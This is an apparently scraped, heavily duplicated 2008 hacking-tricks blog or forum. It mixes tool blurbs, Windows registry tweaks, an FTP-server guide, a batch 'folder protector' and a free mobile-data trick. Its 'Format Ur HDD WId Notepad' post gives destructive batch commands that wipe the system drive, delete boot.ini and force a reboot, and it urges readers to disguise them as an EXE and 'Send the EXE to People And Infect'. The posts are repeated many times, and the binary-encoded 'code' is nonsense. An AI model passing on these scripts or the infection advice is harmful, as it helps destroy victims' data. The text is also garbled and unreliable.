Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Get Kismet Here
14. NetStumbler
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.
Get NetStumbler Here
15. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here
Hardcore Virus Making

Code: Select all

Code: Select all
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Code: Select all
Code: Select all
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Hardcore Virus Making

Code: Select all

Code: Select all
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Code: Select all
Code: Select all
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Saturday, November 22, 2008
Remove Recycle Bin Frm Ur PC
How to remove Recycle Bin Icon from Desktop
If using XP Pro
On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry
If using XP Pro
On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry
Remove Recycle Bin Frm Ur PC
How to remove Recycle Bin Icon from Desktop
If using XP Pro
On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry
If using XP Pro
On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry
Access Free Airtel GPRS Using TeaShark Browser
TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.
Here is how I used this…
* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.
Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!
As of now, this trick is limited to handsets only.
Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.
Download Here
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.
Here is how I used this…
* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.
Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!
As of now, this trick is limited to handsets only.
Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.
Download Here
Access Free Airtel GPRS Using TeaShark Browser
TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.
Here is how I used this…
* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.
Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!
As of now, this trick is limited to handsets only.
Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.
Download Here
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.
Here is how I used this…
* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.
Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!
As of now, this trick is limited to handsets only.
Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.
Download Here
Change Ur IE Title Forever.....
Change the following registry entry-
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Shubham Rocks"
Replace the "Shubham Rocks" with what ever text you would like to have displayed in the Title bar of the Internet Explorer Windows.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Shubham Rocks"
Replace the "Shubham Rocks" with what ever text you would like to have displayed in the Title bar of the Internet Explorer Windows.
Change Ur IE Title Forever.....
Change the following registry entry-
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Shubham Rocks"
Replace the "Shubham Rocks" with what ever text you would like to have displayed in the Title bar of the Internet Explorer Windows.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Shubham Rocks"
Replace the "Shubham Rocks" with what ever text you would like to have displayed in the Title bar of the Internet Explorer Windows.
Saturday, November 15, 2008
Create An Ftp Server On Ur PC
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..
1) Goto no-ip & create urself a free account.
2) Now ur account been created & ll receive ur account password via mail to ur email address.
3) After getting ur password login to ur account of
4.After getting logged in, click upon add a HOST its on the left menu.
5) Type any hostname u want (eg:-abc) & select any domain from da given list ( Click on Submit.
6) Now u have owned ur own static address (example:
7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..
8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.
9) At last tick on da check box present at the static address.
10) U have ur own static web address.
Installation & setting of the FTP-Server
1) You have to install Serv-U 4.1.03 , download this software from here
2) Run Serv-U & use da wizard to setup ur FTP.
3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.
4) Enter ur domain name u have registered (example: it above in da domain field & click upon next.
5) U ll be asked for anonymous access, select No & click upon next.
6) Next u ll be asked for creating a named account, select yes & click upon next.
7) Choose any user name u wish (eg:-xyz) & clcik upon next.
8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.
9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.
10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.
11) At last ur account has been created click finish.
Configuring the user accounts which u have been created.
1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.
2) Goto Hide 'Hidden' Files.
3) Check Allow only and enter the number one in the box.
4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.
5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6) Click upon Dir Access Tab.
7) Now u can c home folder here.Highlight it & make ur permission.
8) If u want only users to download check only these Read,List & Inherit.
9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.
10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.
11) There are many things u can do, These are only the basics....
12) Your server is now ready to be connected..
13) Login with your username & password...
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..
1) Goto no-ip & create urself a free account.
2) Now ur account been created & ll receive ur account password via mail to ur email address.
3) After getting ur password login to ur account of
4.After getting logged in, click upon add a HOST its on the left menu.
5) Type any hostname u want (eg:-abc) & select any domain from da given list ( Click on Submit.
6) Now u have owned ur own static address (example:
7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..
8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.
9) At last tick on da check box present at the static address.
10) U have ur own static web address.
Installation & setting of the FTP-Server
1) You have to install Serv-U 4.1.03 , download this software from here
2) Run Serv-U & use da wizard to setup ur FTP.
3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.
4) Enter ur domain name u have registered (example: it above in da domain field & click upon next.
5) U ll be asked for anonymous access, select No & click upon next.
6) Next u ll be asked for creating a named account, select yes & click upon next.
7) Choose any user name u wish (eg:-xyz) & clcik upon next.
8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.
9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.
10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.
11) At last ur account has been created click finish.
Configuring the user accounts which u have been created.
1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.
2) Goto Hide 'Hidden' Files.
3) Check Allow only and enter the number one in the box.
4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.
5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6) Click upon Dir Access Tab.
7) Now u can c home folder here.Highlight it & make ur permission.
8) If u want only users to download check only these Read,List & Inherit.
9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.
10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.
11) There are many things u can do, These are only the basics....
12) Your server is now ready to be connected..
13) Login with your username & password...
Create An Ftp Server On Ur PC
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..
1) Goto no-ip & create urself a free account.
2) Now ur account been created & ll receive ur account password via mail to ur email address.
3) After getting ur password login to ur account of
4.After getting logged in, click upon add a HOST its on the left menu.
5) Type any hostname u want (eg:-abc) & select any domain from da given list ( Click on Submit.
6) Now u have owned ur own static address (example:
7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..
8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.
9) At last tick on da check box present at the static address.
10) U have ur own static web address.
Installation & setting of the FTP-Server
1) You have to install Serv-U 4.1.03 , download this software from here
2) Run Serv-U & use da wizard to setup ur FTP.
3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.
4) Enter ur domain name u have registered (example: it above in da domain field & click upon next.
5) U ll be asked for anonymous access, select No & click upon next.
6) Next u ll be asked for creating a named account, select yes & click upon next.
7) Choose any user name u wish (eg:-xyz) & clcik upon next.
8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.
9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.
10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.
11) At last ur account has been created click finish.
Configuring the user accounts which u have been created.
1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.
2) Goto Hide 'Hidden' Files.
3) Check Allow only and enter the number one in the box.
4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.
5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6) Click upon Dir Access Tab.
7) Now u can c home folder here.Highlight it & make ur permission.
8) If u want only users to download check only these Read,List & Inherit.
9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.
10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.
11) There are many things u can do, These are only the basics....
12) Your server is now ready to be connected..
13) Login with your username & password...
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..
1) Goto no-ip & create urself a free account.
2) Now ur account been created & ll receive ur account password via mail to ur email address.
3) After getting ur password login to ur account of
4.After getting logged in, click upon add a HOST its on the left menu.
5) Type any hostname u want (eg:-abc) & select any domain from da given list ( Click on Submit.
6) Now u have owned ur own static address (example:
7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..
8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.
9) At last tick on da check box present at the static address.
10) U have ur own static web address.
Installation & setting of the FTP-Server
1) You have to install Serv-U 4.1.03 , download this software from here
2) Run Serv-U & use da wizard to setup ur FTP.
3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.
4) Enter ur domain name u have registered (example: it above in da domain field & click upon next.
5) U ll be asked for anonymous access, select No & click upon next.
6) Next u ll be asked for creating a named account, select yes & click upon next.
7) Choose any user name u wish (eg:-xyz) & clcik upon next.
8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.
9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.
10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.
11) At last ur account has been created click finish.
Configuring the user accounts which u have been created.
1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.
2) Goto Hide 'Hidden' Files.
3) Check Allow only and enter the number one in the box.
4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.
5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6) Click upon Dir Access Tab.
7) Now u can c home folder here.Highlight it & make ur permission.
8) If u want only users to download check only these Read,List & Inherit.
9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.
10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.
11) There are many things u can do, These are only the basics....
12) Your server is now ready to be connected..
13) Login with your username & password...
Incresing Broadband Speed .................Quite Simple
A Simple Tweak (XP Pro only) which will increase your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.
Incresing Broadband Speed .................Quite Simple
A Simple Tweak (XP Pro only) which will increase your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.
Format Ur HDD WId Notepad
If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Step 1 :-
Copy The Following In Notepad Exactly as it is.
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Format Ur HDD WId Notepad
If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Step 1 :-
Copy The Following In Notepad Exactly as it is.
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Chat Friends With Ms Dos Command Prompt
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
Chat Friends With Ms Dos Command Prompt
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
Wednesday, November 12, 2008
Live Chat With Ur Offline Friends
Yes, this is right. You can have live conversation with you offline friends. The real thing is that sometimes the friends who appear offline is not really offline. He may be in invisible mode because he may be busy. You are going to learn how to find who is offline and who is online but in invisible mode.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be these two possibilities :
1. If the user is offline Doodle are will show this “waiting for your friend to load Doodle” continuously . You will see IMAGE 1.
2. If the user is in invisible mode and is online than you will notice IMAGE 2 just few seconds after you see IMAGE 1.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be these two possibilities :
1. If the user is offline Doodle are will show this “waiting for your friend to load Doodle” continuously . You will see IMAGE 1.
2. If the user is in invisible mode and is online than you will notice IMAGE 2 just few seconds after you see IMAGE 1.


Live Chat With Ur Offline Friends
Yes, this is right. You can have live conversation with you offline friends. The real thing is that sometimes the friends who appear offline is not really offline. He may be in invisible mode because he may be busy. You are going to learn how to find who is offline and who is online but in invisible mode.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be these two possibilities :
1. If the user is offline Doodle are will show this “waiting for your friend to load Doodle” continuously . You will see IMAGE 1.
2. If the user is in invisible mode and is online than you will notice IMAGE 2 just few seconds after you see IMAGE 1.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be these two possibilities :
1. If the user is offline Doodle are will show this “waiting for your friend to load Doodle” continuously . You will see IMAGE 1.
2. If the user is in invisible mode and is online than you will notice IMAGE 2 just few seconds after you see IMAGE 1.


Create Ur Own Folder Protecting Software
You may be thinking that you need to download some softwares from internet to do that. Or you may be thinking that I will teach you to protect the files by hiding. NO ! NO ! NO !
You will learn here to make your own software to create FileProtector software. You will be able to do this just by the Notepad and the program provided here. Here is how to do that.
1) Copy the program below starting from #START# and copy upto #STOP#
2) Remove “pankaj” from the program and enter your password there.
3) Open Notepad and paste the program into it.
4) Save the notepad as FileProtector.bat
5) Double Click the FileProtector.bat file. You will see a new folder FileProtector created. There, you can store your files and folders to be password protected.
6) Double Click the file again, type y and press enter. The FileProtector folder will be hidden.
7) Double Click again and enter the password which you had set in STEP 2.
Thats all ! Your FileProtector software has been created. Now enjoy using free software created by you.
Q. What if somebody deletes my batch file ?
A. Don’t worry. You need to only create the batch file again with the same process as you did now and you will get all your files and folders back safely.
title Folder FileProtector
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST FileProtector goto MDFileProtector
echo Unprotected : Press y to lock the folder.
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren FileProtector "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder FileProtector
goto End
echo Please , give your password to open the protected files !
set/p "pass=>"
if NOT %pass%== pankaj goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FileProtector
echo FileProtector Unlocked successfully
goto End
echo Invalid password
goto end
md FileProtector
echo FileProtector created successfully
goto End
You will learn here to make your own software to create FileProtector software. You will be able to do this just by the Notepad and the program provided here. Here is how to do that.
1) Copy the program below starting from #START# and copy upto #STOP#
2) Remove “pankaj” from the program and enter your password there.
3) Open Notepad and paste the program into it.
4) Save the notepad as FileProtector.bat
5) Double Click the FileProtector.bat file. You will see a new folder FileProtector created. There, you can store your files and folders to be password protected.
6) Double Click the file again, type y and press enter. The FileProtector folder will be hidden.
7) Double Click again and enter the password which you had set in STEP 2.
Thats all ! Your FileProtector software has been created. Now enjoy using free software created by you.
Q. What if somebody deletes my batch file ?
A. Don’t worry. You need to only create the batch file again with the same process as you did now and you will get all your files and folders back safely.
title Folder FileProtector
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST FileProtector goto MDFileProtector
echo Unprotected : Press y to lock the folder.
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren FileProtector "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder FileProtector
goto End
echo Please , give your password to open the protected files !
set/p "pass=>"
if NOT %pass%== pankaj goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FileProtector
echo FileProtector Unlocked successfully
goto End
echo Invalid password
goto end
md FileProtector
echo FileProtector created successfully
goto End
Create Ur Own Folder Protecting Software
You may be thinking that you need to download some softwares from internet to do that. Or you may be thinking that I will teach you to protect the files by hiding. NO ! NO ! NO !
